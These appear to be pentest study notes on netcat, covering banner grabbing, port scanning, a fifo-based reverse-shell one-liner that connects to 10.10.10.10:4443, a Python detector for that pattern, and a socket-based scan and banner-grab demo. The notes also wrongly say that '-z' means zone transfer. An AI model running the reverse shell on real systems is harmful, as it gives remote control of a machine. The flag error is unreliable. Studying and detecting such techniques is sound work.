# Netcat

* TCP/IP Swiss Army Knife - we will use this tool a lot
* Can scan ports but can also be used for:
  * chatting between two computers
  * banner grabbing
  * file transfer
  * getting a shell
* Traffic is not encrypted (unless you use **ncat** with its `--ssl` option)

## Banner Grabbing

```
nc -v google.com 80
```

This connects nc to Google's server if port 80 is open; we can then query it manually, for example:

![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MkmHETOG-_mdJ5bh837%2F-MkmHXqYrcINKpcJd7AD%2Fimage.png?alt=media\&token=2d18ca29-5017-4a38-a39f-11cb1ef36e88)

After connecting, we can type an HTTP request using methods like **GET, HEAD, OPTIONS etc.** and the server will return its response (status line, headers such as `Server`, and body).

## Netcat without -e flag

Many netcat builds (for example the OpenBSD variant) are compiled without `-e`. The pipeline below gets the same result with a named pipe: the shell reads its input from the fifo, its output (stderr merged into stdout) is piped into nc, and whatever nc receives is written back into the fifo.

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
```
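From the defender's side, that one-liner has a recognisable shape in process or audit logs: a `mkfifo` stage, an interactive shell stage (`sh -i`), and an `nc`/`ncat` stage whose stdout is redirected into the same fifo. The following is an added example (not from the original page) of a small checker that flags such command lines; the sample command lines are constructed for the demo, and the helper names are my own.

```python
import os
import re
import shlex

# Programs that make up the pattern: a shell run interactively and a netcat
# variant, joined through a named pipe created by mkfifo.
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
NETCATS = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}

# Constructed sample command lines, as they might appear in an auditd
# EXECVE record or an EDR process-creation event.
SAMPLE_CMDLINES = [
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f",
    "mkfifo /tmp/backup.pipe; tar cf - /srv/data | gzip > /tmp/backup.pipe",
    "nc -nv -w 1 -z 192.168.1.1 1-1024",
    "cat /var/log/syslog | grep -i error",
]


def _stages(cmdline):
    """Split a shell command line into its ';' and '|' separated stages."""
    return [s.strip() for s in re.split(r"[;|]", cmdline) if s.strip()]


def fifo_reverse_shell_indicator(cmdline):
    """Return the fifo path if cmdline matches the mkfifo / sh -i / nc pattern, else None."""
    fifo = None
    has_interactive_shell = False
    has_netcat = False

    for stage in _stages(cmdline):
        try:
            words = shlex.split(stage)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            words = stage.split()
        if not words:
            continue
        prog = os.path.basename(words[0])
        if prog == "mkfifo" and len(words) > 1:
            fifo = words[-1]
        elif prog in SHELLS and "-i" in words[1:]:
            has_interactive_shell = True
        elif prog in NETCATS:
            has_netcat = True

    # All three pieces must be present and nc's stdout must feed the fifo back.
    if fifo and has_interactive_shell and has_netcat:
        if ">" + fifo in cmdline.replace(" ", ""):
            return fifo
    return None


def flag_suspicious(cmdlines):
    """Return the command lines that match the fifo reverse-shell pattern."""
    return [c for c in cmdlines if fifo_reverse_shell_indicator(c) is not None]


if __name__ == "__main__":
    for line in flag_suspicious(SAMPLE_CMDLINES):
        print("suspicious:", line)
```

The check deliberately requires all three stages plus the redirect, so an ordinary fifo-based backup pipeline or a plain port scan is not flagged; in a real detection you would feed it the reconstructed command line from your process-creation telemetry rather than a raw log line.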

## Port Scanning

```
 nc -nv -w 1 -z 192.168.1.1 1-1024
 
-nv = doesn't resolve dns
-w 1 = sets timeout to 1 second
-z = specifies zone transfer
-u = UDP mode (can be unreliable)
```
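To make explicit what `nc -z -w 1` and the manual banner grab above actually do on the wire, here is an added example (not from the original page) that reimplements both steps with raw sockets: a connect scan with a per-port timeout, followed by sending a `HEAD` request by hand and parsing the status line and headers. So that it runs offline it starts a throwaway local HTTP server; the server, its `DemoServer/1.0` banner, and the function names are all my own constructions.

```python
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class _DemoHandler(BaseHTTPRequestHandler):
    # Constructed banner so the grabbed Server header is predictable.
    server_version = "DemoServer/1.0"

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_test_server():
    """Start a local HTTP/1.0 server on a random port and return it."""
    srv = HTTPServer(("127.0.0.1", 0), _DemoHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def scan_ports(host, ports, timeout=1.0):
    """Equivalent of `nc -z -w <timeout>`: TCP connect, send nothing, list open ports."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host, port, timeout=2.0):
    """What you type into `nc host 80` by hand: a raw HEAD request.

    Returns (status_line, headers) with header names lower-cased.
    """
    request = f"HEAD / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:  # server closed the connection
                break
            chunks.append(data)
    raw = b"".join(chunks).decode(errors="replace")
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


if __name__ == "__main__":
    srv = start_test_server()
    port = srv.server_address[1]
    print("open ports:", scan_ports("127.0.0.1", [port]))
    status, headers = grab_banner("127.0.0.1", port)
    print(status, "| Server:", headers.get("server"))
    srv.shutdown()
    srv.server_close()
```

`connect_ex` returning 0 is exactly the signal nc reports with `-z`; a refused or timed-out connection is treated as closed, which is why `-w` matters on filtered hosts where the timeout is the only thing that ends the wait.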
